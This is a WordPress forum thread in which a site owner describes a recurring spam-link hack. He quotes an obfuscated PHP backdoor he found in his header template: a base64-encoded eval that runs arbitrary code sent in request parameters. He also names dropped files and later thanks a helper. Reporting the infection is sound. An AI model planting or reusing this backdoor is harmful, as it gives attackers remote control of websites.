Spammed/hacked???

  • Hey Folks,

    About a month ago one my sites was spammed or hacked. Google dropped me because the pages had a bunch of invisible links heading out to viagra, et al .. I found what I thought was the source, deleted it, and changed my password, etc. google lovingly welcomed me back. Yesterday I found the same hack again – I believe it included this:

    <?php eval(base64_decode(“aWYoQCRfUkVRVUVTVFsiQSJdID09ICJiIiBhbmQgaXNzZXQoJF9SRVFVRVNUWyJDIl0pKSBldmFsKHN0cmlwc2xhc2hlcyhzdHJpcHNsYXNoZXMoJF9SRVFVRVNUWyJDIl0pKSk7”)); ?>

    sitting in the header template.

    There was also a file called:

    template-functions-comments.php

    on the site, and, last time, another, called:

    wp-functions.php

    in the includes folder. Are those spam files?

    That’s all the files I found, anyway.

    I upgraded to the newer wordpress versions today, so hopefully that problem won’t reoccur. Any further information or advice would be appreciated.

    Thank you.

    Cheers

    Carl

Viewing 16 replies (of 16 total)
  • Thread Starter walkinman

    (@walkinman)

    Hey Whooami,

    Perfect! Thanks so much for your help.

    Hopefully the hacking thing is done and you won’t see me around no mo’. ??

    Thanks again.

    Cheers

    Carl

Viewing 16 replies (of 16 total)
  • The topic ‘Spammed/hacked???’ is closed to new replies.